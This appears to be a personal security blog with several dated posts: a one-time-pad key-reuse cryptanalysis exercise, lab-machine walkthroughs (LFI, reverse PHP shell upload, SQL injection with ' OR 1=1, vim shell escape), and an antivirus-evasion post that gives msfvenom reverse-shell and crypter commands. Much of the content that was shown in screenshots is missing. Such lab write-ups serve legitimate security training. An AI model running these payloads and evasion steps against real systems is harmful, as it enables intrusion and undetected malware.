Monday, 31 July 2017

Taking advantage of one-time pad key reuse

Hello,
Today we will have pleasure play with cryptoanalysis of One-Time Pad.

We have following scenario:
Someone was using the same key for several different messages. We were able to capture these ciphertexts and we we want to decrypt them.
We know that sender was very lazy and used the same key for each messages.

We know that:
c_i = m_i XOR k
where:
c_i - cipher text
m_i - message in plaintext
k - key which has been used to encrypt messages (every time the same)

Captured ciphertexts:

ciphertext #1:
315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764703de0f3d524400a19b159610b11ef3e
ciphertext #2:
234c02ecbbfbafa3ed18510abd11fa724fcda2018a1a8342cf064bbde548b12b07df44ba7191d9606ef4081ffde5ad46a5069d9f7f543bedb9c861bf29c7e205132eda9382b0bc2c5c4b45f919cf3a9f1cb74151f6d551f4480c82b2cb24cc5b028aa76eb7b4ab24171ab3cdadb8356f
ciphertext #3:
32510ba9a7b2bba9b8005d43a304b5714cc0bb0c8a34884dd91304b8ad40b62b07df44ba6e9d8a2368e51d04e0e7b207b70b9b8261112bacb6c866a232dfe257527dc29398f5f3251a0d47e503c66e935de81230b59b7afb5f41afa8d661cb
ciphertext #4:
32510ba9aab2a8a4fd06414fb517b5605cc0aa0dc91a8908c2064ba8ad5ea06a029056f47a8ad3306ef5021eafe1ac01a81197847a5c68a1b78769a37bc8f4575432c198ccb4ef63590256e305cd3a9544ee4160ead45aef520489e7da7d835402bca670bda8eb775200b8dabbba246b130f040d8ec6447e2c767f3d30ed81ea2e4c1404e1315a1010e7229be6636aaa
ciphertext #5:
3f561ba9adb4b6ebec54424ba317b564418fac0dd35f8c08d31a1fe9e24fe56808c213f17c81d9607cee021dafe1e001b21ade877a5e68bea88d61b93ac5ee0d562e8e9582f5ef375f0a4ae20ed86e935de81230b59b73fb4302cd95d770c65b40aaa065f2a5e33a5a0bb5dcaba43722130f042f8ec85b7c2070
ciphertext #6:
32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd2061bbde24eb76a19d84aba34d8de287be84d07e7e9a30ee714979c7e1123a8bd9822a33ecaf512472e8e8f8db3f9635c1949e640c621854eba0d79eccf52ff111284b4cc61d11902aebc66f2b2e436434eacc0aba938220b084800c2ca4e693522643573b2c4ce35050b0cf774201f0fe52ac9f26d71b6cf61a711cc229f77ace7aa88a2f19983122b11be87a59c355d25f8e4
ciphertext #7:
32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd90f1fa6ea5ba47b01c909ba7696cf606ef40c04afe1ac0aa8148dd066592ded9f8774b529c7ea125d298e8883f5e9305f4b44f915cb2bd05af51373fd9b4af511039fa2d96f83414aaaf261bda2e97b170fb5cce2a53e675c154c0d9681596934777e2275b381ce2e40582afe67650b13e72287ff2270abcf73bb028932836fbdecfecee0a3b894473c1bbeb6b4913a536ce4f9b13f1efff71ea313c8661dd9a4ce
ciphertext #8:
315c4eeaa8b5f8bffd11155ea506b56041c6a00c8a08854dd21a4bbde54ce56801d943ba708b8a3574f40c00fff9e00fa1439fd0654327a3bfc860b92f89ee04132ecb9298f5fd2d5e4b45e40ecc3b9d59e9417df7c95bba410e9aa2ca24c5474da2f276baa3ac325918b2daada43d6712150441c2e04f6565517f317da9d3
ciphertext #9:
271946f9bbb2aeadec111841a81abc300ecaa01bd8069d5cc91005e9fe4aad6e04d513e96d99de2569bc5e50eeeca709b50a8a987f4264edb6896fb537d0a716132ddc938fb0f836480e06ed0fcd6e9759f40462f9cf57f4564186a2c1778f1543efa270bda5e933421cbe88a4a52222190f471e9bd15f652b653b7071aec59a2705081ffe72651d08f822c9ed6d76e48b63ab15d0208573a7eef027
ciphertext #10:
466d06ece998b7a2fb1d464fed2ced7641ddaa3cc31c9941cf110abbf409ed39598005b3399ccfafb61d0315fca0a314be138a9f32503bedac8067f03adbf3575c3b8edc9ba7f537530541ab0f9f3cd04ff50d66f1d559ba520e89a2cb2a83
We know how XOR works, and we should exploit the knowledge
c_i XOR c_j = m_i XOR m_j XOR k XOR k = m_i XOR m_j
 So, if we guess some part of message (for example i) then we should get a part of plain text comes from message j - becuase:
m_i XOR m_i XOR m_j = m_j
The most popular word in English are for example: The, he, ing, etc.
Let's write a short script to decrypt the messages

First version of the script




























We have done final code as below












Now we are able to guess each of the messages.

Result:
Messages:
m_1 = we can factor the number 15 with quantum computers. We can also factor the number 15 with a dog trained to bark three times - Robert Harley
m_2 = Euler would probably enjoy that now his theorem becomes a corner stone of crypto - Annonymous on Euler's theorem
m_3 = The nice thing about Keeyloq is now we cryptographers can drive a lot of fancy cars - Dan Boneh
m_4 = The ciphertext produced by a weak encryption algorithm looks as good as ciphertext produced by a strong encryption algorithm - Philip Zimmermann
m_5 = You don't want to buy a set of car keys from a guy who specializes in stealing cars - Marc Rotenberg commenting on Clipper
m_6 = There are two types of cryptography - that which will keep secrets safe from your little sister, and that which will keep secrets safe from your government - Bruce Schneier
m_7 = There are two types of cyptography: one that allows the Government to use brute force to break the code, and one that requires the Government to use brute force to break you
m_8 = We can see the point where the chip is unhappy if a wrong bit is sent and consumes more power from the environment - Adi Shamir
m_9 = A (private-key) encryption scheme states 3 algorithms, namely a procedure for generating keys, a procedure for encrypting, and a procedure for decrypting.?
m_10 = The Concise OxfordDictionary (2006) defines crypto as the art of writing o r solving codes.
goal = The secret message is: When using a stream cipher, never use the key more than once

Thursday, 25 May 2017

OSWP

Hello guys,
I would like to apologize that I didn't write any posts for a long time, but I have a very good excuse - I was working on my OSWP :-)

Monday, 27 March 2017

Sedna challenge

Hello,

Today I want to show you a Sedna hackfest walkthrough.

Scanning















There are a lot of open ports. I was trying play with Samba, but there is nothing interesting except version - 4.6.1 (I didn't find valid exploit for this version of Samba).
I was trying browse port 8080, but to manager's panel I need to know valid web based authentication credentials. Default credentials such as: admin:admin and tomcat:tomcat don't work.

So, I decided to browse 80 port.





















OK, let's run DirBuster to find the web application directories structure.









Hmmm, unfortunately I didn't find entry point to hack the target.
So, because I didn't have some interesting idea I decided to run nikto vulnerability scanner and it found license.txt file, which may be interesting...













Running /license.txt I found something juicy.
















This page provided us to information that web application utilizes BuilderEngine. I was looking for valid exploit and BINGO!
We are able to use - "BuilderEngine 3.5.0 - Arbitrary File Upload".
I have executed URL from exploit






I have created new file named exploit.html which contains part of content of our exploit.







I have run apache server and execute our exploit. So I have uploaded PHP Reverse Shell file named shell.php.
Now, we have to find our backdoor.




















Excellent! Our shell is uploaded, now let's execute it.











Great! We have got limited shell!

TBU

Tuesday, 21 March 2017

Pluck challenge

Hello,

Let's start the challenge.

Nmap scanning







OK, we discovered four open ports. Let's begin, as always, from web application.

















So, let's penetrate the web application deeper. We can see also that on the dashboard is link to admin panel.








Good, we discovered LFI. We can see very interesting information from /etc/passwd. I mean
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
Let's try display content of the file.







We know that out target hosts TFTP service and if we could connect to the TFTP we will be able to (probably) download /backups/backup.tar file.








Excellent! Let's examine what is backup.tar file.



















Wow, as far as I know the file is a backup of /var/www/html/* and /home/* files! In particular in /home/* we will be able to find some SSH keys.











Awesome! Using id_key4, we have got following screen















Editting, via Edit file, /home/paul/keys/id_key1.pub, we are able to connect to paul's shell using vim trick - :set shell=/bin/bash and :shell.



Excellent! We have got limited shell! We can see that Linux Kernel is 4.8 and we can find valid local privileges explioit.













Very good! We are root!

Game over

Monday, 20 March 2017

hackfest2016: Quaoar

Hello everyone!

Today I would like to present to you the hackfest2016 Quaoar walkthrough :)

Nmap scanning









Wow, there is bunch of open ports.

I started from Samba enumeration, but I didn't find something interesting except information about samba version (3.6.3).

So I decided to try find something within the web application.















Dirbuster found some helpful (?) paths.









Now, we know that the web application utilizes a wordpress CMS. So, if we can know username from posts on the websites, we will be able to use wpscan to try bruteforce this user's password.























After admin:admin attemption - success!











Excellent! Let's try edit some plugin or something like that and upload reverse php shell..
I had edited existing Plugin - Aksimet and I activaed it.
I executed appropriate path to run our uploaded webshell.













Amazing, we have got limited shell. Now, we have to escalate our privileges.
I went to /var/www/wordpress and I found there config file.















Great! We have valid MySQL credentials. So, let's exploit it.
Hmmm rootpassword! maybe will be also valid for Linux root?
BINGO!















Game over!



Friday, 10 March 2017

VirusTotal challenge

Hello everyone,

Today I would like to present several methods of antivirus mechanisms evasion.

Within this article I will use couple tools such as: metasploit, shellter, veil-evasion.

Conclusion of the article will be comparison of efficiency generated payloads.

1. Metasploit Framework
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -o shell_reverse.exe
 I think that it is so potty result - 43/59 AV verified that our paylaod is malicious.

Let's try generate the same payload but with encoding
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
 The same potty result.

Now, let's try inject our malicious payload into other program.
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
 Better, but still it isn't suit us.

  • cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
    cp /usr/share/windows-binaries/Hyperion-1.0.zip .
    unzip Hyperion-1.0.zip
    cd Hyperion-1.0/
    i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
    wine hyperion.exe ../backdoor.exe ../crypted.exe

 Hmmm, still to high detection ratio.

2. Veil-evasion
Veil evasion is a very useful tool which is compatible with metasploit payloads.

Let's lists payloads

Good, let's use for example payload 35.
 Quite nice! Detection ratio is lower than 50%.

3. Shellter
Shellter is the most effective tool to bypass AV detection. Shellter utilize no-malcious program such as putty.exe and incject malicious instruction.

We can use A (automation) mode. Next we have to set PE target - file which we will inject.
 Great! For me detection ratio is very low, isn't it?

As we can see shellter is very effective tool to AV evasion.


 


Monday, 13 February 2017

DC146:2016 dick dastardly

Hello,

Now it is turn to dick dastardly challenge!

Scanning all ports...






Enumerating web pages


















Excellent! The dirb scanner found several interesting files on our target.
The admin.php redirect us to index.php










Very interesting. Filling in username as admin and password as ' OR 1=1 -- - we have got following result





















Nice! Now we are able to use sqlmap and try to find valid credentials.








Good, let's enumerate deeper! Unfortunately we are not able to retrieve databases names. So, we have to look for other opportunity to get these names.











Excellent! We found second vulnerable parameter. Let's enumerate databases






Very good, let's examine vulnhub database.
Database: vulnhub
Table: admins
[1 entry]
+----+--------------------------------------+--------+
| id | pass                                 | user   |
+----+--------------------------------------+--------+
| 1  | 1b37y0uc4n76u3557h15p455w0rd,5uck3rz | rasta  |
+----+--------------------------------------+--------+
It is not SSH valid password for rasta username :( I don't know for what is the password.
After clicking on add IP to IRC whitelist I performed nmap scanning again and I have got very interesting result













Very good! I installed irssi on my attacker machine and I connected to our target IRC.